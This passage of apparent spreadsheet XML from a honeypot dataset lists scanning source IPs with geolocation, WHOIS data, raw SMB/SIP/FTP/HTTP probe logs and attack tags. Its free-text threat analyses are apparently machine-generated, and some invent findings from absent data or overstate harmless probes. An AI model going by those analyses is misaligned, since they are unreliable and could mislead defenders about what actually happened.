(103.175.188.37,57019)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,57125)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,57615)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,57699)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,60771)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,60804)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,61217)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,60820)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,60900)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,57762)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,62078)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,62204)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,61461)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,61462)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,61797)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,53591)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,53597)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,53974)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,62840)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,51749)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,55599)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,56606)}</t>
  </si>
  <si>
    <t>::ffff:67af:bc25</t>
  </si>
  <si>
    <t>No available log data provided for analysis. &amp;&amp; An unknown system from IP address 103.175.188 is making an incoming SMB connection to the monitored service at port 62840. This could be a potential attempt to exploit a vulnerability or spread malware. The system may also be scanning for open ports and services. &amp;&amp; An unknown IP address is attempting to connect to a shared resource using SMB protocol.
This could be a scan or reconnaissance attempt by an attacker.
Possible malicious activity may be in progress. &amp;&amp; Unauthorized user attempted to authenticate using SMB protocol, suggesting potential password cracking or malware activity. This could be an attempt to gain access to network resources. The user may be trying to exploit vulnerabilities in the system. &amp;&amp; The attacker is attempting to authenticate with the SMB service using an invalid message format, potentially trying to exploit vulnerabilities or gather information. This could be an attempt at brute forcing credentials or exploiting a buffer overflow vulnerability in the SMB service. The attacker may be trying to gain unauthorized access to sensitive files and data. &amp;&amp; An SMB authenticate message was sent to the system, potentially attempting unauthorized access to share resources.
This could be an indication of a brute-force attack or scanning for vulnerable shares.
The attacker is trying to obtain login credentials. &amp;&amp; Possible malicious activity is an SMB authentication attempt which could be part of a brute force attack or unauthorized access to network resources. This may indicate a vulnerability scan or exploitation attempt by an attacker. An intruder might be trying to gain unauthorized access using valid credentials or attempting to crack them. &amp;&amp; No data provided. &amp;&amp; A suspicious incoming SMB connection has been detected from IP address 103.175.188.37 on an unknown port, which may be a sign of unauthorized access or malicious activity. This could potentially allow attackers to spread malware, steal sensitive data, or disrupt network operations. The IP address and port combination may indicate a botnet or malicious actor attempting to exploit vulnerabilities in SMB services. &amp;&amp; Possible malicious activity: A remote device attempted to establish a connection to an SMB service on our system from an external IP address. The source IP address is 103.175.188.37 and the remote port used was 56606. This may indicate unauthorized access or potential malware spread via the SMB service.</t>
  </si>
  <si>
    <t>SMB Brute &amp;&amp; SMB Auth Bypass &amp;&amp; Password Cracking &amp;&amp; SMB Auth &amp;&amp; SMB Scan &amp;&amp; SMB Scanning</t>
  </si>
  <si>
    <t>7ccd014e3974e85e6a972e247c610044</t>
  </si>
  <si>
    <t>125.26.175.245</t>
  </si>
  <si>
    <t>node-yr9.pool-125-26.dynamic.nt-isp.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24</t>
  </si>
  <si>
    <t>Bangkok Yai</t>
  </si>
  <si>
    <t>1619457</t>
  </si>
  <si>
    <t>13.7232</t>
  </si>
  <si>
    <t>100.476</t>
  </si>
  <si>
    <t>23969</t>
  </si>
  <si>
    <t>TOT Public Company Limited</t>
  </si>
  <si>
    <t>2006-10-26</t>
  </si>
  <si>
    <t>totnet</t>
  </si>
  <si>
    <t>2025-01-17 03:50:09</t>
  </si>
  <si>
    <t>2026-01-17 03:50:09</t>
  </si>
  <si>
    <t>2025-01-20 03:36:34</t>
  </si>
  <si>
    <t>['NS1.TOTONLINE.NET', 'NS2.TOTONLINE.NET']</t>
  </si>
  <si>
    <t>GMO Internet, Inc.</t>
  </si>
  <si>
    <t>ok https://icann.org/epp#ok</t>
  </si>
  <si>
    <t>Whois Privacy Protection Service by onamae.com</t>
  </si>
  <si>
    <t>['abuse@gmo.jp', 'proxy@whoisprotectservice.com']</t>
  </si>
  <si>
    <t>['26-1 Sakuragaoka-cho', 'Cerulean Tower 11F']</t>
  </si>
  <si>
    <t>::ffff:7d1a:aff5</t>
  </si>
  <si>
    <t>0e5143ded4fe61317801e5b232d8e8dc</t>
  </si>
  <si>
    <t>41.63.167.40</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H11&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_SMB_H25&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H28&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H20</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;1433&amp;&amp;445&amp;&amp;58605&amp;&amp;NA</t>
  </si>
  <si>
    <t>AO</t>
  </si>
  <si>
    <t>Angola</t>
  </si>
  <si>
    <t>LUA</t>
  </si>
  <si>
    <t>Luanda</t>
  </si>
  <si>
    <t>Luanda Municipality</t>
  </si>
  <si>
    <t>Luanda (Ingombota)</t>
  </si>
  <si>
    <t>2240449</t>
  </si>
  <si>
    <t>-8.82337</t>
  </si>
  <si>
    <t>13.2446</t>
  </si>
  <si>
    <t>36907</t>
  </si>
  <si>
    <t>TV CABO ANGOLA LDA</t>
  </si>
  <si>
    <t>TVCAO-CRNTW4</t>
  </si>
  <si>
    <t>TVCabo Angola, Lda</t>
  </si>
  <si>
    <t>2010-12-01</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,11959)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,5405)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,53246)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,11094)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,63084)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,42673)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,62233)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,54457)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,35870)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,47297)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,1476)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,50929)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,42234)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,3829)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,35967)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,55964)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,50476)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,54593)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,16691)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,25231)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,4538)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,34591)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,63829)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:293f:a728</t>
  </si>
  <si>
    <t>The attacker is probing various services to identify potential vulnerabilities and gain unauthorized access. They are attempting to brute-force login credentials, scanning for open ports, and sending malicious requests to exploit weaknesses in the systems. &amp;&amp; No log data is provided for analysis. 
However, assuming typical honeypot logs, here's an example of what might be inferred:
Malicious activity detected involving attempted unauthorized access to sensitive system resources potentially via exploitation of vulnerabilities or brute-force attacks on credentials. Suspected malicious scripts or bots are attempting to scan and exploit open services on the network. Investigation into potential malicious intentions is warranted due to unusual traffic patterns. &amp;&amp; No log data provided. &amp;&amp; An incoming connection from an unknown IP address is attempting to access a service on the system, potentially indicating unauthorized access attempts. The source IP address 41.63.167.40 and port 34591 are trying to establish a connection. This could be a malicious actor probing for vulnerabilities. &amp;&amp; Possible malicious activity detected - an incoming SMB connection attempt from unknown IP address 41.63.167.40 to a potentially exposed service on this system. The source port is 34591, indicating potential brute-force or reconnaissance attempts. This could be a precursor to unauthorized data access or transfer. &amp;&amp; A remote host is connecting to a shared resource on a system, possibly attempting unauthorized access or file transfer. The source IP address and port number suggest an external entity initiating the connection. This could be a potential security threat if not properly managed. &amp;&amp; A remote system has established an incoming connection to a SMB service from IP address 41.63.167.40 on port 63829, potentially indicating a malicious attempt to access the system's resources or exploit a vulnerability. 
The source IP may be attempting unauthorized file sharing or data transfer.
This could also be part of a larger malware or ransomware attack. &amp;&amp; A malicious actor is attempting to authenticate using a SMB service, likely as part of a broader attack or reconnaissance effort.
This could be an initial step towards gaining unauthorized access to sensitive network resources or data. 
It may also indicate a brute-force attempt or password cracking operation. &amp;&amp; An SMB authentication attempt is detected, which may indicate a brute-force login or unauthorized access attempt. The presence of an authenticate message suggests a malicious actor trying to gain access to shared resources. This could be part of a larger attack on the network.</t>
  </si>
  <si>
    <t>SMB Scanning &amp;&amp; SMB Brute &amp;&amp; SMB Attack &amp;&amp; SMB Scanning &amp;&amp; SMB Bruteforce &amp;&amp; SMB Auth Bypass</t>
  </si>
  <si>
    <t>a83ab289bb9fd0b2087966776dc14153</t>
  </si>
  <si>
    <t>200.125.191.34</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;43168&amp;&amp;3306</t>
  </si>
  <si>
    <t>A</t>
  </si>
  <si>
    <t>Distrito Federal</t>
  </si>
  <si>
    <t>Libertador Municipality</t>
  </si>
  <si>
    <t>Caracas</t>
  </si>
  <si>
    <t>3646738</t>
  </si>
  <si>
    <t>10.4806</t>
  </si>
  <si>
    <t>-66.9036</t>
  </si>
  <si>
    <t>394684</t>
  </si>
  <si>
    <t>GOLD DATA USA INC</t>
  </si>
  <si>
    <t>Gold Data C.A</t>
  </si>
  <si>
    <t>Admin Systems</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,61363)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,61829)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,54665)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,54069)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,56875)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,57281)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,58366)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,58796)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,59889)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,60673)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,61603)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,62050)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,51611)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,52294)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,53941)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,54513)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,60538)}&amp;&amp;{Data_SMB:Incoming connection (200.125.191.34,60850)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:c87d:bf22</t>
  </si>
  <si>
    <t>An incoming connection was made from IP address 200.125.191.34 to a SMB service on port 60538, which may indicate an attempt at unauthorized access or malicious activity. This could be part of a larger attack or reconnaissance. Further analysis is needed to determine the true intentions behind this connection. &amp;&amp; A suspicious incoming SMB connection has been detected from IP address 200.125.191.34 to port 60538, which may indicate a potential malware or ransomware attack. The target port suggests the attacker is attempting to exploit vulnerabilities related to file and printer sharing. This could be an initial step in spreading malicious software within the network. &amp;&amp; An incoming SMB connection attempt has been detected from an external IP address, potentially indicating a malicious attempt to access or exploit sensitive network resources on this system. This could be an attacker probing for vulnerable systems or attempting unauthorized file sharing access. Malicious SMB connections can often be indicative of larger cyber threats. &amp;&amp; Incoming SMB connection from IP 200.125.191.34 on port 60850, potentially indicating a brute force or unauthorized access attempt to a shared resource. This could be an indication of malware scanning for vulnerabilities or exploitation of weaknesses in the system. The source may be attempting to gain unauthorized access. &amp;&amp; Unauthorized access detected through SMB service, user authenticated and gained access to local resources. This suggests a potential security breach or attempted intrusion. User credentials were likely compromised or guessed correctly. &amp;&amp; An SMB user has authenticated using a basic credential, potentially indicating unauthorized access or a brute-force attack on a network share. This could be an attempt to escalate privileges or gain unauthorized access to sensitive files. The use of basic credentials suggests a lack of encryption or secure authentication.</t>
  </si>
  <si>
    <t>SMB Brute &amp;&amp; SMB Scan &amp;&amp; SMB Scanning &amp;&amp; SMB Auth</t>
  </si>
  <si>
    <t>88ca2a89967c59c25e96cdd096eb6550</t>
  </si>
  <si>
    <t>87.236.176.244</t>
  </si>
  <si>
    <t>gracious.monitoring.internet-measurement.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
    <t>&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_MYSQL_H14&amp;&amp;SMA-LAB_PJL_H11&amp;&amp;SMA-LAB_SIP_H39&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_SOCKS5_H36&amp;&amp;SMA-LAB_IMAP_H4&amp;&amp;SMA-LAB_FTP_H22&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_REDIS_H5&amp;&amp;SMA-LAB_MYSQL_H26&amp;&amp;SMA-LAB_MYSQL_H33&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_H38&amp;&amp;SMA-LAB_POSTGRES_H5&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_FTP_H46&amp;&amp;SMA-LAB_RDP_H32&amp;&amp;SMA-LAB_LDAP_H13&amp;&amp;SMA-LAB_ORACLE_H17&amp;&amp;SMA-LAB_REDIS_H28&amp;&amp;SMA-LAB_SIP_H22&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_IMAP_H16&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_SOCKS5_H27&amp;&amp;SMA-LAB_SMB_H11&amp;&amp;SMA-LAB_ORACLE_H41&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_HTTPS_H47&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_SIP_H8&amp;&amp;SMA-LAB_REDIS_H21&amp;&amp;SMA-LAB_HTTPS_H2&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_REDIS_H27&amp;&amp;SMA-LAB_SMTP_H16&amp;&amp;SMA-LAB_REDIS_H34&amp;&amp;SMA-LAB_SIP_H14&amp;&amp;SMA-LAB_SMTP_H13&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_REDIS_H12&amp;&amp;SMA-LAB_SMTP_H28&amp;&amp;SMA-LAB_SOCKS5_H7&amp;&amp;SMA-LAB_POSTGRES_H46&amp;&amp;SMA-LAB_SOCKS5_H11&amp;&amp;SMA-LAB_POSTGRES_H18&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_SOCKS5_H23&amp;&amp;SMA-LAB_SOCKS5_H19&amp;&amp;SMA-LAB_REDIS_H29&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_SOCKS5_H34</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;32965&amp;&amp;443&amp;&amp;110&amp;&amp;3306&amp;&amp;23&amp;&amp;6379&amp;&amp;NA&amp;&amp;9100&amp;&amp;143&amp;&amp;1080&amp;&amp;21&amp;&amp;5432&amp;&amp;445&amp;&amp;1433&amp;&amp;3389&amp;&amp;1521&amp;&amp;25&amp;&amp;5900&amp;&amp;80&amp;&amp;389&amp;&amp;6667</t>
  </si>
  <si>
    <t>connection&amp;&amp;stshash&amp;&amp;command&amp;&amp;GET&amp;&amp;request&amp;&amp;query&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eltons'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.244,54855)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'wuufnuig', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:87.236.176.244;tag=wuufnuig', 'max-forwards': '0', 'to': 'sip:38.54.63.23', 'via': 'SIP/2.0/UDP 87.236.176.244:5060;branch=z9hG4bKwuufnuig;received=87.236.176.244;rport=46876'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '95.164.21.98', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 91.194.11.82:9100_x000D_
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000D_
Connection: close_x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'ndajoldm', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:87.236.176.244;tag=ndajoldm', 'max-forwards': '0', 'to': 'sip:154.90.63.129', 'via': 'SIP/2.0/UDP 87.236.176.244:5060;branch=z9hG4bKndajoldm;received=87.236.176.244;rport=48035'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'tbjjjxyw', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:87.236.176.244;tag=tbjjjxyw', 'max-forwards': '0', 'to': 'sip:149.102.153.168', 'via': 'SIP/2.0/UDP 87.236.176.244:5060;branch=z9hG4bKtbjjjxyw;received=87.236.176.244;rport=36753'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 38.54.63.23:9100_x000D_
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000D_
Connection: close_x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'zvmogfgx', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:87.236.176.244;tag=zvmogfgx', 'max-forwards': '0', 'to': 'sip:185.250.150.39', 'via': 'SIP/2.0/UDP 87.236.176.244:5060;branch=z9hG4bKzvmogfgx;received=87.236.176.244;rport=38103'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'yxlsmeti', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:87.236.176.244;tag=yxlsmeti', 'max-forwards': '0', 'to': 'sip:149.102.153.168', 'via': 'SIP/2.0/UDP 87.236.176.244:5060;branch=z9hG4bKyxlsmeti;received=87.236.176.244;rport=59101'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:57ec:b0f4</t>
  </si>
  <si>
    <t>No log data provided, cannot analyze or provide any information about malicious activity. &amp;&amp; No LDAP activity detected, but this could be indicative of a potential scanning or probing attempt to identify vulnerable services. The lack of activity in the LDAP log suggests that an attacker may have been trying to exploit a weak password or other vulnerability. This could be a precursor to more malicious activity such as brute-force attacks or password cracking. &amp;&amp; Malicious activity detected involving attempted access or probing of a PostgreSQL service, possibly as reconnaissance for a potential attack. The attacker may be testing vulnerabilities or gathering information about the system's configuration. This behavior is indicative of pre-attack reconnaissance. &amp;&amp; Possible malicious activity: A user attempted to access help information, which could be a reconnaissance step or an attempt to gather information about the system before launching further attacks. This behavior is suspicious as legitimate users typically do not request help when interacting with the service.</t>
  </si>
  <si>
    <t>34b35ceaa4e2acb1e80e3146d1f16c18</t>
  </si>
  <si>
    <t>103.168.159.158</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_SMB_H3&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMTP_H5&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H36</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1433&amp;&amp;445&amp;&amp;21028&amp;&amp;25&amp;&amp;52802&amp;&amp;NA</t>
  </si>
  <si>
    <t>JB</t>
  </si>
  <si>
    <t>West Java</t>
  </si>
  <si>
    <t>Bogor Regency</t>
  </si>
  <si>
    <t>Caringin</t>
  </si>
  <si>
    <t>1647298</t>
  </si>
  <si>
    <t>-6.70611</t>
  </si>
  <si>
    <t>106.821</t>
  </si>
  <si>
    <t>142317</t>
  </si>
  <si>
    <t>PT Cover Network Indonesia</t>
  </si>
  <si>
